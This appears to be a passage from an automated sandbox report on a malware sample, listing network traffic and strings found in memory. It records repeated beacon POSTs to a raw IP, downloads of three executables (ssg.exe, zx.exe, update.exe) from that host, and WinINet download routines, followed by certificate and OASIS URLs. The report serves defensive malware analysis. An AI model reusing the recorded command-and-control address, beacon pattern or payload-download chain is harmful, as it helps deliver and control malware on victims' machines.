                    Source: global trafficHTTP traffic detected: POST /VzCAHn.php?443320E440F81953448019 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
                    Source: global trafficHTTP traffic detected: POST /VzCAHn.php?443320E440F81953448019 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
                    Source: global trafficHTTP traffic detected: POST /VzCAHn.php?443320E440F81953448019 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
                    Source: global trafficHTTP traffic detected: POST /VzCAHn.php?443320E440F81953448019 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
                    Source: global trafficHTTP traffic detected: POST /VzCAHn.php?443320E440F81953448019 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
                    Source: global trafficHTTP traffic detected: POST /VzCAHn.php?443320E440F81953448019 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
                    Source: global trafficHTTP traffic detected: POST /VzCAHn.php?443320E440F81953448019 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
                    Source: global trafficHTTP traffic detected: POST /VzCAHn.php?443320E440F81953448019 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
                    Source: global trafficHTTP traffic detected: POST /VzCAHn.php?443320E440F81953448019 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
                    Source: global trafficHTTP traffic detected: POST /VzCAHn.php?443320E440F81953448019 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
                    Source: global trafficHTTP traffic detected: POST /VzCAHn.php?443320E440F81953448019 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
                    Source: global trafficHTTP traffic detected: POST /VzCAHn.php?443320E440F81953448019 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
                    Source: global trafficHTTP traffic detected: POST /VzCAHn.php?443320E440F81953448019 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
                    Source: global trafficHTTP traffic detected: POST /VzCAHn.php?443320E440F81953448019 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                    Source: C:\Users\user\Desktop\m5804Te9Uw.exeCode function: 3_2_00007FF7F73E2168 InternetOpenW,Sleep,InternetOpenUrlW,InternetOpenUrlW,InternetCloseHandle,Sleep,HttpQueryInfoA,InternetCloseHandle,InternetCloseHandle,Sleep,InternetCloseHandle,InternetOpenUrlW,InternetCloseHandle,Sleep,HttpQueryInfoA,GetProcessHeap,RtlAllocateHeap,InternetCloseHandle,InternetCloseHandle,InternetReadFile,InternetCloseHandle,InternetCloseHandle,3_2_00007FF7F73E2168
                    Source: global trafficHTTP traffic detected: GET /ssg.exe HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                    Source: global trafficHTTP traffic detected: GET /zx.exe HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                    Source: global trafficHTTP traffic detected: GET /update.exe HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                    Source: unknownHTTP traffic detected: POST /VzCAHn.php?443320E440F81953448019 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                    Source: explorer.exe, 00000007.00000002.2546084384.0000000009D58000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://185.81.68.147/ssg.exe
                    Source: explorer.exe, 00000007.00000002.2546084384.0000000009D58000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://185.81.68.147/update.exe
                    Source: explorer.exe, 00000007.00000002.2546084384.0000000009D58000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://185.81.68.147/zx.exe
                    Source: 5B34.tmp.zx.exe, 0000000F.00000003.1478082591.000002271234F000.00000004.00000020.00020000.00000000.sdmp, 5B34.tmp.zx.exe, 0000000F.00000003.1467567529.000002271234F000.00000004.00000020.00020000.00000000.sdmp, 5B34.tmp.zx.exe, 0000000F.00000003.1476279166.000002271234F000.00000004.00000020.00020000.00000000.sdmp, 5B34.tmp.zx.exe, 0000000F.00000003.1467805681.000002271234F000.00000004.00000020.00020000.00000000.sdmp, 5B34.tmp.zx.exe, 0000000F.00000003.1468347235.000002271234F000.00000004.00000020.00020000.00000000.sdmp, 5B34.tmp.zx.exe, 0000000F.00000003.1479405567.000002271234F000.00000004.00000020.00020000.00000000.sdmp, 5B34.tmp.zx.exe, 0000000F.00000003.1468690442.000002271234F000.00000004.00000020.00020000.00000000.sdmp, 5B34.tmp.zx.exe, 0000000F.00000003.1480543968.0000022712359000.00000004.00000020.00020000.00000000.sdmp, 5B34.tmp.zx.exe, 0000000F.00000003.1480543968.000002271234F000.00000004.00000020.00020000.00000000.sdmp, 5B34.tmp.zx.exe, 0000000F.00000003.1477346297.000002271234F000.00000004.00000020.00020000.00000000.sdmp, 5B34.tmp.zx.exe, 0000000F.00000003.1468185228.000002271234F000.00000004.00000020.00020000.00000000.sdmp, 5B34.tmp.zx.exe, 0000000F.00000003.1479405567.000002271235C000.00000004.00000020.00020000.00000000.sdmp, select.pyd.15.dr, _socket.pyd.15.dr, _hashlib.pyd.15.dr, _ctypes.pyd.15.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
                    Source: explorer.exe, 00000007.00000000.1287594201.000000000955E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1287594201.00000000094DC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2543182442.000000000955E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2543182442.00000000094DC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
                    Source: 5B34.tmp.zx.exe, 0000000F.00000003.1478082591.000002271234F000.00000004.00000020.00020000.00000000.sdmp, 5B34.tmp.zx.exe, 0000000F.00000003.1467567529.000002271234F000.00000004.00000020.00020000.00000000.sdmp, 5B34.tmp.zx.exe, 0000000F.00000003.1476279166.000002271234F000.00000004.00000020.00020000.00000000.sdmp, 5B34.tmp.zx.exe, 0000000F.00000003.1467805681.000002271234F000.00000004.00000020.00020000.00000000.sdmp, 5B34.tmp.zx.exe, 0000000F.00000003.1476279166.000002271235C000.00000004.00000020.00020000.00000000.sdmp, 5B34.tmp.zx.exe, 0000000F.00000003.1468347235.000002271234F000.00000004.00000020.00020000.00000000.sdmp, 5B34.tmp.zx.exe, 0000000F.00000003.1479405567.000002271234F000.00000004.00000020.00020000.00000000.sdmp, 5B34.tmp.zx.exe, 0000000F.00000003.1468690442.000002271234F000.00000004.00000020.00020000.00000000.sdmp, 5B34.tmp.zx.exe, 0000000F.00000003.1480543968.0000022712359000.00000004.00000020.00020000.00000000.sdmp, 5B34.tmp.zx.exe, 0000000F.00000003.1480543968.000002271234F000.00000004.00000020.00020000.00000000.sdmp, 5B34.tmp.zx.exe, 0000000F.00000003.1477346297.000002271234F000.00000004.00000020.00020000.00000000.sdmp, 5B34.tmp.zx.exe, 0000000F.00000003.1468185228.000002271234F000.00000004.00000020.00020000.00000000.sdmp, 5B34.tmp.zx.exe, 0000000F.00000003.1479405567.000002271235C000.00000004.00000020.00020000.00000000.sdmp, select.pyd.15.dr, _socket.pyd.15.dr, _hashlib.pyd.15.dr, _ctypes.pyd.15.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
                    Source: 5B34.tmp.zx.exe, 0000000F.00000003.1466980210.000002271234F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.mic
                    Source: 5B34.tmp.zx.exe, 0000000F.00000003.1466980210.000002271234F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micN
                    Source: 5B34.tmp.zx.exe, 0000000F.00000003.1478082591.000002271234F000.00000004.00000020.00020000.00000000.sdmp, 5B34.tmp.zx.exe, 0000000F.00000003.1467567529.000002271234F000.00000004.00000020.00020000.00000000.sdmp, 5B34.tmp.zx.exe, 0000000F.00000003.1476279166.000002271234F000.00000004.00000020.00020000.00000000.sdmp, 5B34.tmp.zx.exe, 0000000F.00000003.1467805681.000002271234F000.00000004.00000020.00020000.00000000.sdmp, 5B34.tmp.zx.exe, 0000000F.00000003.1468347235.000002271234F000.00000004.00000020.00020000.00000000.sdmp, 5B34.tmp.zx.exe, 0000000F.00000003.1479405567.000002271234F000.00000004.00000020.00020000.00000000.sdmp, 5B34.tmp.zx.exe, 0000000F.00000003.1468690442.000002271234F000.00000004.00000020.00020000.00000000.sdmp, 5B34.tmp.zx.exe, 0000000F.00000003.1480543968.000002271234F000.00000004.00000020.00020000.00000000.sdmp, 5B34.tmp.zx.exe, 0000000F.00000003.1477346297.000002271234F000.00000004.00000020.00020000.00000000.sdmp, 5B34.tmp.zx.exe, 0000000F.00000003.1468185228.000002271234F000.00000004.00000020.00020000.00000000.sdmp, select.pyd.15.dr, _socket.pyd.15.dr, _hashlib.pyd.15.dr, _ctypes.pyd.15.drString found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
                    Source: 5B34.tmp.zx.exe, 0000000F.00000003.1478082591.000002271234F000.00000004.00000020.00020000.00000000.sdmp, 5B34.tmp.zx.exe, 0000000F.00000003.1467567529.000002271234F000.00000004.00000020.00020000.00000000.sdmp, 5B34.tmp.zx.exe, 0000000F.00000003.1476279166.000002271234F000.00000004.00000020.00020000.00000000.sdmp, 5B34.tmp.zx.exe, 0000000F.00000003.1467805681.000002271234F000.00000004.00000020.00020000.00000000.sdmp, 5B34.tmp.zx.exe, 0000000F.00000003.1468347235.000002271234F000.00000004.00000020.00020000.00000000.sdmp, 5B34.tmp.zx.exe, 0000000F.00000003.1479405567.000002271234F000.00000004.00000020.00020000.00000000.sdmp, 5B34.tmp.zx.exe, 0000000F.00000003.1468690442.000002271234F000.00000004.00000020.00020000.00000000.sdmp, 5B34.tmp.zx.exe, 0000000F.00000003.1480543968.0000022712359000.00000004.00000020.00020000.00000000.sdmp, 5B34.tmp.zx.exe, 0000000F.00000003.1480543968.000002271234F000.00000004.00000020.00020000.00000000.sdmp, 5B34.tmp.zx.exe, 0000000F.00000003.1477346297.000002271234F000.00000004.00000020.00020000.00000000.sdmp, 5B34.tmp.zx.exe, 0000000F.00000003.1468185228.000002271234F000.00000004.00000020.00020000.00000000.sdmp, 5B34.tmp.zx.exe, 0000000F.00000003.1479405567.000002271235C000.00000004.00000020.00020000.00000000.sdmp, select.pyd.15.dr, _socket.pyd.15.dr, _hashlib.pyd.15.dr, _ctypes.pyd.15.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
                    Source: explorer.exe, 00000007.00000000.1287594201.000000000955E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1287594201.00000000094DC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2543182442.000000000955E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2543182442.00000000094DC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
                    Source: 5B34.tmp.zx.exe, 0000000F.00000003.1478082591.000002271234F000.00000004.00000020.00020000.00000000.sdmp, 5B34.tmp.zx.exe, 0000000F.00000003.1467567529.000002271234F000.00000004.00000020.00020000.00000000.sdmp, 5B34.tmp.zx.exe, 0000000F.00000003.1476279166.000002271234F000.00000004.00000020.00020000.00000000.sdmp, 5B34.tmp.zx.exe, 0000000F.00000003.1467805681.000002271234F000.00000004.00000020.00020000.00000000.sdmp, 5B34.tmp.zx.exe, 0000000F.00000003.1476279166.000002271235C000.00000004.00000020.00020000.00000000.sdmp, 5B34.tmp.zx.exe, 0000000F.00000003.1468347235.000002271234F000.00000004.00000020.00020000.00000000.sdmp, 5B34.tmp.zx.exe, 0000000F.00000003.1479405567.000002271234F000.00000004.00000020.00020000.00000000.sdmp, 5B34.tmp.zx.exe, 0000000F.00000003.1468690442.000002271234F000.00000004.00000020.00020000.00000000.sdmp, 5B34.tmp.zx.exe, 0000000F.00000003.1480543968.0000022712359000.00000004.00000020.00020000.00000000.sdmp, 5B34.tmp.zx.exe, 0000000F.00000003.1480543968.000002271234F000.00000004.00000020.00020000.00000000.sdmp, 5B34.tmp.zx.exe, 0000000F.00000003.1477346297.000002271234F000.00000004.00000020.00020000.00000000.sdmp, 5B34.tmp.zx.exe, 0000000F.00000003.1468185228.000002271234F000.00000004.00000020.00020000.00000000.sdmp, 5B34.tmp.zx.exe, 0000000F.00000003.1479405567.000002271235C000.00000004.00000020.00020000.00000000.sdmp, select.pyd.15.dr, _socket.pyd.15.dr, _hashlib.pyd.15.dr, _ctypes.pyd.15.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
                    Source: 5B34.tmp.zx.exe, 0000000F.00000003.1478082591.000002271234F000.00000004.00000020.00020000.00000000.sdmp, 5B34.tmp.zx.exe, 0000000F.00000003.1467567529.000002271234F000.00000004.00000020.00020000.00000000.sdmp, 5B34.tmp.zx.exe, 0000000F.00000003.1476279166.000002271234F000.00000004.00000020.00020000.00000000.sdmp, 5B34.tmp.zx.exe, 0000000F.00000003.1467805681.000002271234F000.00000004.00000020.00020000.00000000.sdmp, 5B34.tmp.zx.exe, 0000000F.00000003.1468347235.000002271234F000.00000004.00000020.00020000.00000000.sdmp, 5B34.tmp.zx.exe, 0000000F.00000003.1479405567.000002271234F000.00000004.00000020.00020000.00000000.sdmp, 5B34.tmp.zx.exe, 0000000F.00000003.1468690442.000002271234F000.00000004.00000020.00020000.00000000.sdmp, 5B34.tmp.zx.exe, 0000000F.00000003.1480543968.0000022712359000.00000004.00000020.00020000.00000000.sdmp, 5B34.tmp.zx.exe, 0000000F.00000003.1480543968.000002271234F000.00000004.00000020.00020000.00000000.sdmp, 5B34.tmp.zx.exe, 0000000F.00000003.1477346297.000002271234F000.00000004.00000020.00020000.00000000.sdmp, 5B34.tmp.zx.exe, 0000000F.00000003.1468185228.000002271234F000.00000004.00000020.00020000.00000000.sdmp, 5B34.tmp.zx.exe, 0000000F.00000003.1479405567.000002271235C000.00000004.00000020.00020000.00000000.sdmp, select.pyd.15.dr, _socket.pyd.15.dr, _hashlib.pyd.15.dr, _ctypes.pyd.15.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
                    Source: explorer.exe, 00000007.00000000.1287594201.0000000009519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1287594201.000000000955E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1287594201.00000000094DC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2543182442.000000000955E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2543182442.0000000009519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2543182442.00000000094DC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
                    Source: 5B34.tmp.zx.exe, 0000000F.00000003.1478082591.000002271234F000.00000004.00000020.00020000.00000000.sdmp, 5B34.tmp.zx.exe, 0000000F.00000003.1467567529.000002271234F000.00000004.00000020.00020000.00000000.sdmp, 5B34.tmp.zx.exe, 0000000F.00000003.1476279166.000002271234F000.00000004.00000020.00020000.00000000.sdmp, 5B34.tmp.zx.exe, 0000000F.00000003.1467805681.000002271234F000.00000004.00000020.00020000.00000000.sdmp, 5B34.tmp.zx.exe, 0000000F.00000003.1476279166.000002271235C000.00000004.00000020.00020000.00000000.sdmp, 5B34.tmp.zx.exe, 0000000F.00000003.1468347235.000002271234F000.00000004.00000020.00020000.00000000.sdmp, 5B34.tmp.zx.exe, 0000000F.00000003.1479405567.000002271234F000.00000004.00000020.00020000.00000000.sdmp, 5B34.tmp.zx.exe, 0000000F.00000003.1468690442.000002271234F000.00000004.00000020.00020000.00000000.sdmp, 5B34.tmp.zx.exe, 0000000F.00000003.1480543968.0000022712359000.00000004.00000020.00020000.00000000.sdmp, 5B34.tmp.zx.exe, 0000000F.00000003.1480543968.000002271234F000.00000004.00000020.00020000.00000000.sdmp, 5B34.tmp.zx.exe, 0000000F.00000003.1477346297.000002271234F000.00000004.00000020.00020000.00000000.sdmp, 5B34.tmp.zx.exe, 0000000F.00000003.1468185228.000002271234F000.00000004.00000020.00020000.00000000.sdmp, 5B34.tmp.zx.exe, 0000000F.00000003.1479405567.000002271235C000.00000004.00000020.00020000.00000000.sdmp, select.pyd.15.dr, _socket.pyd.15.dr, _hashlib.pyd.15.dr, _ctypes.pyd.15.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
                    Source: 2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.00000000026F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary
                    Source: 2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.00000000026F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#HexBinary
                    Source: 2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.00000000026F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Text
                    Source: 2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.00000000026F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd
                    Source: 2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.00000000026F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
                    Source: 2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.00000000026F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509SubjectKeyIdentif
                    Source: 2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.00000000026F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ
                    Source: 2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.00000000026F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ1510
                    Source: 2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.00000000026F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#Kerberosv5APREQSHA1
                    Source: 2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.00000000026F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-rel-token-profile-1.0.pdf#license
                    Source: 2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.00000000026F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionID
                    Source: 2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.00000000026F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLID
                    Source: 2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.00000000026F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV1.1
                    Source: 2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.00000000026F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV2.0
                    Source: 2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.00000000026F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKey
                    Source: 2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.00000000026F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKeySHA1
                    Source: 2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.00000000026F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#ThumbprintSHA1
                    Source: 2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.00000000026F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-wssecurity-secext-1.1.xsd
                    Source: explorer.exe, 00000007.00000000.1287594201.000000000955E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1287594201.00000000094DC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2543182442.000000000955E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2543182442.00000000094DC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                    Source: 5B34.tmp.zx.exe, 0000000F.00000003.1478082591.000002271234F000.00000004.00000020.00020000.00000000.sdmp, 5B34.tmp.zx.exe, 0000000F.00000003.1467567529.000002271234F000.00000004.00000020.00020000.00000000.sdmp, 5B34.tmp.zx.exe, 0000000F.00000003.1476279166.000002271234F000.00000004.00000020.00020000.00000000.sdmp, 5B34.tmp.zx.exe, 0000000F.00000003.1467805681.000002271234F000.00000004.00000020.00020000.00000000.sdmp, 5B34.tmp.zx.exe, 0000000F.00000003.1468347235.000002271234F000.00000004.00000020.00020000.00000000.sdmp, 5B34.tmp.zx.exe, 0000000F.00000003.1479405567.000002271234F000.00000004.00000020.00020000.00000000.sdmp, 5B34.tmp.zx.exe, 0000000F.00000003.1468690442.000002271234F000.00000004.00000020.00020000.00000000.sdmp, 5B34.tmp.zx.exe, 0000000F.00000003.1480543968.0000022712359000.00000004.00000020.00020000.00000000.sdmp, 5B34.tmp.zx.exe, 0000000F.00000003.1480543968.000002271234F000.00000004.00000020.00020000.00000000.sdmp, 5B34.tmp.zx.exe, 0000000F.00000003.1477346297.000002271234F000.00000004.00000020.00020000.00000000.sdmp, 5B34.tmp.zx.exe, 0000000F.00000003.1468185228.000002271234F000.00000004.00000020.00020000.00000000.sdmp, 5B34.tmp.zx.exe, 0000000F.00000003.1479405567.000002271235C000.00000004.00000020.00020000.00000000.sdmp, 